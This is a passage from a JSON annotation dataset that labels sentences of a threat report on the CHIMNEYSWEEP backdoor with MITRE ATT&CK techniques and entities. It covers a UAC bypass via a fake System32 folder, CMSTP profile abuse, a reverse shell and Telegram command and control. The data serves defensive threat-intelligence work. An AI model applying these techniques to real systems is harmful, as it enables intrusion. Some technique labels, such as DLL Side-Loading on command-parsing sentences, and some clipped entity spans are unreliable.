"Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s108-bdd03a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "This task executes the executable running in %windir%\\system32\\cleanmgr.exe, and the payload uses the Windows Registry Environment key to change the %windir% variable to point to c:\\Windows.", "sentence_text": "Next, the payload creates a new System32 folder and copies an embedded payload called cleanmgr.exe (MD5: 779940f675ff4ab4e8cab7a1b7cf5d3c) into this folder , alongside a .cfg file with the content “slc”.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Payload creates fake System32 folder with embedded cleanmgr.exe and slc config file", "entities": [ { "text": "payload", "start": 10, "end": 17, "label": "MalwareTool" }, { "text": "creates a new System32 folder", "start": 18, "end": 47, "label": "Action" }, { "text": "copies an embedded payload called cleanmgr.exe", "start": 52, "end": 98, "label": "Action" }, { "text": "MD5: 779940f675ff4ab4e8cab7a1b7cf5d3c", "start": 100, "end": 137, "label": "Infrastructure_Indicator" }, { "text": ".cfg file with the content “slc”.", "start": 170, "end": 203, "label": "Infrastructure_Indicator" }, { "text": "System32 folder", "start": 32, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s109-d3ac6a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "Next, the payload creates a new System32 folder and copies an embedded payload called cleanmgr.exe (MD5: 779940f675ff4ab4e8cab7a1b7cf5d3c) into this folder , alongside a .cfg file with the content “slc”.", "sentence_text": "Following this, the task is executed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s110-4bea83", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "Following this, the task is executed.", "sentence_text": "This technique is similar to a technique within Metasploit called bypassuac_silentcleanup.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s111-7e7220", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "This technique is similar to a technique within Metasploit called bypassuac_silentcleanup.", "sentence_text": "Makes use of the windows CMSTP.exe binary to install a malicious Microsoft Connection Manager Profile on the device.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1218.003", "name": "CMSTP" } ], "procedure": "Payload uses CMSTP.exe to install malicious Connection Manager Profile", "entities": [ { "text": " use of the windows CMSTP.exe binary", "start": 5, "end": 41, "label": "Action" }, { "text": "CMSTP.exe", "start": 25, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "nstall a malicious Microsoft Connection Manager Profile", "start": 46, "end": 101, "label": "Action" }, { "text": "Microsoft Connection Manager Profile", "start": 65, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s112-a8bf65", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "Makes use of the windows CMSTP.exe binary to install a malicious Microsoft Connection Manager Profile on the device.", "sentence_text": "This technique drops cln.vbs to the c:\\windows\\temp folder (MD5: 7a77c2930f0457ed2dd622e9739c7d3d), then creates a .ini file for the Ethernet service.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.003", "name": "CMSTP" } ], "procedure": "CMSTP technique drops cln.vbs and creates Ethernet service .ini file", "entities": [ { "text": "This technique", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "drops cln.vbs to the c:\\windows\\temp folder ", "start": 15, "end": 59, "label": "Action" }, { "text": "creates a .ini file for the Ethernet service.", "start": 105, "end": 150, "label": "Action" }, { "text": "MD5: 7a77c2930f0457ed2dd622e9739c7d3d", "start": 60, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "c:\\windows\\temp folder", "start": 36, "end": 58, "label": "Infrastructure_Indicator" }, { "text": ".ini file for the Ethernet service.", "start": 115, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s113-9347b0", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "This technique drops cln.vbs to the c:\\windows\\temp folder (MD5: 7a77c2930f0457ed2dd622e9739c7d3d), then creates a .ini file for the Ethernet service.", "sentence_text": "Within this ini file, the payload contains two RunPreSetupCommandsSection values, one for the payload itself, and the second for executing the cln.vbs script.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.003", "name": "CMSTP" } ], "procedure": "INI file contains RunPreSetupCommandsSection for payload and cln.vbs execution", "entities": [ { "text": "RunPreSetupCommandsSection", "start": 47, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "contains two RunPreSetupCommandsSection values", "start": 34, "end": 80, "label": "Action" }, { "text": "executing the cln.vbs script.", "start": 129, "end": 158, "label": "Action" }, { "text": "cln.vbs script.", "start": 143, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s114-d853e6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "Within this ini file, the payload contains two RunPreSetupCommandsSection values, one for the payload itself, and the second for executing the cln.vbs script.", "sentence_text": "The legitimate cmstp.exe will then be executed on the host which executes the backdoor and then the clean-up script.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.003", "name": "CMSTP" } ], "procedure": "cmstp.exe executes backdoor and cleanup script through malicious profile", "entities": [ { "text": "legitimate cmstp.exe", "start": 4, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "executes the backdoor and then the clean-up script.", "start": 65, "end": 116, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s115-c4b01b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "The legitimate cmstp.exe will then be executed on the host which executes the backdoor and then the clean-up script.", "sentence_text": "This technique is identical to a technique made public in 2017 by Oddvar Moe CHIMNEYSWEEP has the following major functionality:\nScreenshot collection:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s116-b8f90d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 116, "context_before": "This technique is identical to a technique made public in 2017 by Oddvar Moe CHIMNEYSWEEP has the following major functionality:\nScreenshot collection:", "sentence_text": "Takes screenshots of the compromised device on a timer and stores to disk or can be tasked to take a screenshot and upload.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "CHIMNEYSWEEP collects screenshots on timer or on-demand for upload", "entities": [ { "text": "Takes screenshots of the compromised device ", "start": 0, "end": 44, "label": "Action" }, { "text": "stores to disk ", "start": 59, "end": 74, "label": "Action" }, { "text": "tasked to take a screenshot and upload.", "start": 84, "end": 123, "label": "Action" }, { "text": "on a timer", "start": 44, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s117-019728", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 117, "context_before": "Takes screenshots of the compromised device on a timer and stores to disk or can be tasked to take a screenshot and upload.", "sentence_text": "File collection and listing: Monitors for new removable drives and performs directory listing on demand, enumerates directories for files that match a set list, and can be tasked to upload a file to the command-and-control server.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1025", "name": "Data from Removable Media" }, { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "CHIMNEYSWEEP monitors removable drives, enumerates files, and uploads to C2", "entities": [ { "text": "Monitors for new removable drives ", "start": 29, "end": 63, "label": "Action" }, { "text": " performs directory listing on demand", "start": 66, "end": 103, "label": "Action" }, { "text": "enumerates directories for files that match a set list,", "start": 105, "end": 160, "label": "Action" }, { "text": "upload a file to the command-and-control server", "start": 182, "end": 229, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s118-a8e9bb", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 118, "context_before": "File collection and listing: Monitors for new removable drives and performs directory listing on demand, enumerates directories for files that match a set list, and can be tasked to upload a file to the command-and-control server.", "sentence_text": "Keylogging: Monitors the content of the clipboard and performs key logging to disk.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "CHIMNEYSWEEP monitors clipboard content and performs keylogging to disk", "entities": [ { "text": "Monitors the content of the clipboard", "start": 12, "end": 49, "label": "Action" }, { "text": "performs key logging to disk.", "start": 54, "end": 83, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s119-84f296", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 119, "context_before": "Keylogging: Monitors the content of the clipboard and performs key logging to disk.", "sentence_text": "Reverse shell: Contains a reverse shell which can be utilised by the attacker.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "CHIMNEYSWEEP provides reverse shell for attacker remote access", "entities": [ { "text": "Contains a reverse shell which can be utilised by the attacker.", "start": 15, "end": 78, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s120-b44713", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 120, "context_before": "Reverse shell: Contains a reverse shell which can be utilised by the attacker.", "sentence_text": "Initial configuration format The backdoor contains settings that are found either encrypted within the payload or stored in the registry (Software\\AppDataLow\\GLX\\Setting).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1112", "name": "Modify Registry" } ], "procedure": "CHIMNEYSWEEP stores configuration encrypted in payload and registry", "entities": [ { "text": "backdoor ", "start": 33, "end": 42, "label": "MalwareTool" }, { "text": "encrypted within the payload ", "start": 82, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "Software\\AppDataLow\\GLX\\Setting", "start": 138, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "stored in the registry", "start": 114, "end": 136, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s121-e62cf9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 121, "context_before": "Initial configuration format The backdoor contains settings that are found either encrypted within the payload or stored in the registry (Software\\AppDataLow\\GLX\\Setting).", "sentence_text": "The values stored in the registry will be provided from the update mechanism.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s122-1e0292", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 122, "context_before": "The values stored in the registry will be provided from the update mechanism.", "sentence_text": "The configuration is split using the tags {BEGIN} and &{END}, and each value within the settings are referenced by an integer.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "CHIMNEYSWEEP uses {BEGIN}/{END} tags and integer references for configuration parsing", "entities": [ { "text": "tags {BEGIN} and &{END}", "start": 37, "end": 60, "label": "Infrastructure_Indicator" }, { "text": " settings are referenced by an integer.", "start": 87, "end": 126, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s123-07bb0e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 123, "context_before": "The configuration is split using the tags {BEGIN} and &{END}, and each value within the settings are referenced by an integer.", "sentence_text": "For extracting the C&C values, the parser stores a reference to values 30-39 where each reference can be a different C&C and URI in order.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "CHIMNEYSWEEP parser extracts C&C values from configuration references 30-39", "entities": [ { "text": "extracting the C&C values", "start": 4, "end": 29, "label": "Action" }, { "text": "values 30-39", "start": 64, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "different C&C and URI in order.", "start": 107, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s124-718079", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "For extracting the C&C values, the parser stores a reference to values 30-39 where each reference can be a different C&C and URI in order.", "sentence_text": "Based on our analysis we assess that the IDs correspond to the following settings:\nNetwork communications and commands During the initialisation of CHIMNEYSWEEP, a thread is created which makes HTTP GET requests to https://api.telegram.org/.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP creates thread for HTTP GET requests to Telegram API during initialization", "entities": [ { "text": "created which makes HTTP GET requests", "start": 174, "end": 211, "label": "Action" }, { "text": "https://api.telegram.org/.", "start": 215, "end": 255, "label": "Infrastructure_Indicator" }, { "text": "During the initialisation", "start": 119, "end": 144, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s125-e15159", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 125, "context_before": "Based on our analysis we assess that the IDs correspond to the following settings:\nNetwork communications and commands During the initialisation of CHIMNEYSWEEP, a thread is created which makes HTTP GET requests to https://api.telegram.org/.", "sentence_text": "The threat actor used the following Telegram bots:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s126-8d0d5c", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 126, "context_before": "The threat actor used the following Telegram bots:", "sentence_text": "These Telegram channels appear to have been in use by the threat actor for a significant period and have messages in the hundreds of thousands which relate to individual tasks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s127-0e858f", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 127, "context_before": "These Telegram channels appear to have been in use by the threat actor for a significant period and have messages in the hundreds of thousands which relate to individual tasks.", "sentence_text": "The backdoor uses Telegram’s GetUpdates API endpoint , which returns a list of messages for the bot.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102.003", "name": "One-Way Communication" } ], "procedure": "CHIMNEYSWEEP backdoor uses Telegram GetUpdates API to retrieve bot messages", "entities": [ { "text": " backdoor", "start": 3, "end": 12, "label": "MalwareTool" }, { "text": "uses Telegram’s GetUpdates API endpoint", "start": 13, "end": 52, "label": "Action" }, { "text": "returns a list of messages for the bot.", "start": 61, "end": 100, "label": "Action" }, { "text": "Telegram’s GetUpdates API ", "start": 18, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s128-b50c7a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 128, "context_before": "The backdoor uses Telegram’s GetUpdates API endpoint , which returns a list of messages for the bot.", "sentence_text": "Data sent and received by the Telegram channel are encoded using Base64 and the same alphabet as ROADSWEEP.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1132.001", "name": "Standard Encoding" } ], "procedure": "Encodes C2 communications using Base64 with custom alphabet", "entities": [ { "text": "ROADSWEEP.", "start": 97, "end": 107, "label": "MalwareTool" }, { "text": "Telegram channel ", "start": 30, "end": 47, "label": "Infrastructure_Indicator" }, { "text": " encoded using Base64 ", "start": 50, "end": 72, "label": "Action" }, { "text": "Data sent and received", "start": 0, "end": 22, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s129-a35f95", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 129, "context_before": "Data sent and received by the Telegram channel are encoded using Base64 and the same alphabet as ROADSWEEP.", "sentence_text": "Within the context of Telegram, CHIMNEYSWEEP uses a unique identifier for the victim based on the computer name and username prepended by TL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Generates unique victim identifier from system data", "entities": [ { "text": "CHIMNEYSWEEP", "start": 32, "end": 44, "label": "MalwareTool" }, { "text": "Telegram", "start": 22, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "uses a unique identifier for the victim based on the computer name and username", "start": 45, "end": 124, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s130-059e2d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 130, "context_before": "Within the context of Telegram, CHIMNEYSWEEP uses a unique identifier for the victim based on the computer name and username prepended by TL.", "sentence_text": "This ID is used for filtering commands for the specific device:\nTL_-\nFollowing the victim identifier, the backdoor uses the string 1 to indicate a task for the update process and 2 to indicate a command to execute on the host.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Filters and routes C2 commands using victim-specific identifiers", "entities": [ { "text": "backdoor", "start": 132, "end": 140, "label": "MalwareTool" }, { "text": "used for filtering commands", "start": 11, "end": 38, "label": "Action" }, { "text": "indicate a task for the update process", "start": 162, "end": 200, "label": "Action" }, { "text": "indicate a command to execute on the host.", "start": 210, "end": 252, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s131-0c7424", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 131, "context_before": "This ID is used for filtering commands for the specific device:\nTL_-\nFollowing the victim identifier, the backdoor uses the string 1 to indicate a task for the update process and 2 to indicate a command to execute on the host.", "sentence_text": "If Telegram is not available, the threat actor communicates to threat actor-owned infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1104", "name": "Multi-Stage Channels" } ], "procedure": "Establishes fallback C2 channel to actor-controlled infrastructure", "entities": [ { "text": "threat actor", "start": 34, "end": 46, "label": "ThreatActor" }, { "text": "threat actor-owned infrastructure.", "start": 63, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "communicates to threat actor-owned infrastructure.", "start": 47, "end": 97, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s132-fb3afb", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 132, "context_before": "If Telegram is not available, the threat actor communicates to threat actor-owned infrastructure.", "sentence_text": "This infrastructure is embedded within the payload and may include one or multiple of the following:\nThe C&C communication protocol consists of several HTTP requests to the server using the argument “do” to specify the command id and “arg” to transfer associated data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Embeds fallback C2 infrastructure and implements HTTP-based protocol", "entities": [ { "text": "infrastructure", "start": 5, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "server", "start": 173, "end": 179, "label": "Infrastructure_Indicator" }, { "text": "embedded within the payload", "start": 23, "end": 50, "label": "Action" }, { "text": "C&C communication protocol consists of several HTTP requests", "start": 105, "end": 165, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s133-ffc9e6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 133, "context_before": "This infrastructure is embedded within the payload and may include one or multiple of the following:\nThe C&C communication protocol consists of several HTTP requests to the server using the argument “do” to specify the command id and “arg” to transfer associated data.", "sentence_text": "However, this update mechanism likely executes the Control_Provider export.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Update mechanism executes Control_Provider export", "entities": [ { "text": "executes the Control_Provider export.", "start": 38, "end": 75, "label": "Action" }, { "text": "Control_Provider", "start": 51, "end": 67, "label": "MalwareTool" } ] }, { "uid": "mitre-96_mitre_report-p1-s134-e5b7de", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 134, "context_before": "However, this update mechanism likely executes the Control_Provider export.", "sentence_text": "Tasking communications\nA second thread is started to handle incoming tasking from either the C&C server or Telegram.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Spawns dedicated thread for C2 tasking handling", "entities": [ { "text": "second thread is started", "start": 25, "end": 49, "label": "Action" }, { "text": "handle incoming tasking", "start": 53, "end": 76, "label": "Action" }, { "text": "C&C server", "start": 93, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "Telegram.", "start": 107, "end": 116, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s135-5ae1e3", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 135, "context_before": "Tasking communications\nA second thread is started to handle incoming tasking from either the C&C server or Telegram.", "sentence_text": "The command effectively works by downloading a request from the server, then parsing this request into a format that is then parsed by CHIMNEYSWEEP.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloads, parses, and processes C2 commands", "entities": [ { "text": "downloading a request from the server", "start": 33, "end": 70, "label": "Action" }, { "text": "parsing this request into a format", "start": 77, "end": 111, "label": "Action" }, { "text": "CHIMNEYSWEEP.", "start": 135, "end": 148, "label": "MalwareTool" } ] }, { "uid": "mitre-96_mitre_report-p1-s136-8ec573", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 136, "context_before": "The command effectively works by downloading a request from the server, then parsing this request into a format that is then parsed by CHIMNEYSWEEP.", "sentence_text": "Payloads are delivered either using the custom Base64 algorithm for Telegram, or in plain text for the standard C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Delivers payloads via multiple encoding methods", "entities": [ { "text": "Payloads are delivered ", "start": 0, "end": 23, "label": "Action" }, { "text": "custom Base64 algorithm for Telegram", "start": 40, "end": 76, "label": "Action" }, { "text": "plain text for the standard C&C server.", "start": 84, "end": 123, "label": "Action" }, { "text": "Telegram", "start": 68, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "standard C&C server.", "start": 103, "end": 123, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s137-2433b4", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 137, "context_before": "Payloads are delivered either using the custom Base64 algorithm for Telegram, or in plain text for the standard C&C server.", "sentence_text": "Commands are made up of 12 distinct arguments encased in square braces.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Structures commands with 12 bracketed arguments", "entities": [ { "text": "Commands are made up of 12 distinct arguments encased in square braces.", "start": 0, "end": 71, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s138-43a6b7", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 138, "context_before": "Commands are made up of 12 distinct arguments encased in square braces.", "sentence_text": "As shown in Figure 10:\nThe backdoor checks for the existence of the \"[Z]\", and that the string ends with a \"]\".", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Validates command structure format", "entities": [ { "text": "backdoor", "start": 27, "end": 35, "label": "MalwareTool" }, { "text": "checks for the existence of the \"[Z]\"", "start": 36, "end": 73, "label": "Action" }, { "text": "string ends with a \"]\".", "start": 88, "end": 111, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s139-373841", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 139, "context_before": "As shown in Figure 10:\nThe backdoor checks for the existence of the \"[Z]\", and that the string ends with a \"]\".", "sentence_text": "The arguments are then passed back to the main C&C loop.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Passes parsed arguments to main C2 loop", "entities": [ { "text": "arguments are then passed back", "start": 4, "end": 34, "label": "Action" }, { "text": "main C&C loop.", "start": 42, "end": 56, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s140-f0ae31", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 140, "context_before": "The arguments are then passed back to the main C&C loop.", "sentence_text": "The timeout is the value in seconds that is slept prior to executing any command on the system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497.003", "name": "Time Based Checks" } ], "procedure": "Implements execution delay via timeout sleep", "entities": [ { "text": "timeout is the value in seconds", "start": 4, "end": 35, "label": "Action" }, { "text": "slept prior to executing any command", "start": 44, "end": 80, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s141-434453", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 141, "context_before": "The timeout is the value in seconds that is slept prior to executing any command on the system.", "sentence_text": "The following commands are supported in variants analysed by Mandiant:\nTasking\nCHIMNEYSWEEP enables two distinct routes to execute commands on the box, a reverse shell and an interactive custom command prompt.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Provides dual command execution methods: reverse shell and custom prompt", "entities": [ { "text": "CHIMNEYSWEEP", "start": 79, "end": 91, "label": "MalwareTool" }, { "text": "execute commands on the box", "start": 123, "end": 150, "label": "Action" }, { "text": "reverse shell ", "start": 154, "end": 168, "label": "Infrastructure_Indicator" }, { "text": "nteractive custom command prompt", "start": 176, "end": 208, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s142-3cadf3", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 142, "context_before": "The following commands are supported in variants analysed by Mandiant:\nTasking\nCHIMNEYSWEEP enables two distinct routes to execute commands on the box, a reverse shell and an interactive custom command prompt.", "sentence_text": "In addition to this, the backdoor enables the threat actor to reboot or shutdown the system or logoff the current user.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1529", "name": "System Shutdown/Reboot" } ], "procedure": "Performs system shutdown, reboot, or user logoff", "entities": [ { "text": "backdoor", "start": 25, "end": 33, "label": "MalwareTool" }, { "text": "threat actor", "start": 46, "end": 58, "label": "ThreatActor" }, { "text": "reboot or shutdown the system", "start": 62, "end": 91, "label": "Action" }, { "text": "logoff the current user.", "start": 95, "end": 119, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s143-f9bb69", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "In addition to this, the backdoor enables the threat actor to reboot or shutdown the system or logoff the current user.", "sentence_text": "For both shells, the command creates a socket to the address and port in the original packet.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Creates socket connection to specified address and port", "entities": [ { "text": "command creates a socket to the address", "start": 21, "end": 60, "label": "Action" }, { "text": "original packet.", "start": 77, "end": 93, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s144-63c66b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "For both shells, the command creates a socket to the address and port in the original packet.", "sentence_text": "For the reverse shell, a cmd.exe process is started with the pipes set to the socket.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Spawns cmd.exe process with socket piping for reverse shell", "entities": [ { "text": "cmd.exe process is started", "start": 25, "end": 51, "label": "Action" }, { "text": "pipes set to the socket.", "start": 61, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "reverse shell", "start": 8, "end": 21, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s145-a75988", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "For the reverse shell, a cmd.exe process is started with the pipes set to the socket.", "sentence_text": "A packet is sent to the C&C server to inform it that a shell is starting.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Sends initiation packet to C2 server upon shell start", "entities": [ { "text": " packet is sent", "start": 1, "end": 16, "label": "Action" }, { "text": "C&C server ", "start": 24, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "inform it that a shell is starting.", "start": 38, "end": 73, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s146-235e78", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "A packet is sent to the C&C server to inform it that a shell is starting.", "sentence_text": "The JPEG settings can be configured by the threat actor in the request as discussed above.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Configures JPEG settings via C2 request", "entities": [ { "text": "threat actor", "start": 43, "end": 55, "label": "ThreatActor" }, { "text": "JPEG settings can be configured ", "start": 4, "end": 36, "label": "Action" }, { "text": " in the request", "start": 55, "end": 70, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s147-060510", 